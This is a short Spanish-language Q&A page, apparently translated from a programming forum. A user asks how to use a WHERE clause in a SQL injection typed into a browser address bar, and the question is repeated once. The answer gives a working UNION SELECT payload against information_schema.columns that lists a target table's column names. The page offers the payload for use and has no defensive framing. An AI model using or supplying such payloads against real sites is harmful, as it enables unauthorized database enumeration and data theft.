¿Cómo puedo usar la declaración "Dónde" durante un ataque de inyección de sql en la barra de direcciones?
por ejemplo:
... from+information_schema.TABLES+where+TABLE_SCHEMA+=+XXXX--
El código anterior no funciona.
¿Cómo puedo usar la declaración "Dónde" durante un ataque de inyección de sql en la barra de direcciones?
por ejemplo:
... from+information_schema.TABLES+where+TABLE_SCHEMA+=+XXXX--
El código anterior no funciona.
Puede recuperar las columnas de una tabla específica con esta solicitud:
UNION SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'tablename'
Fuente: enlace
Lea otras preguntas en las etiquetas sql-injection mysql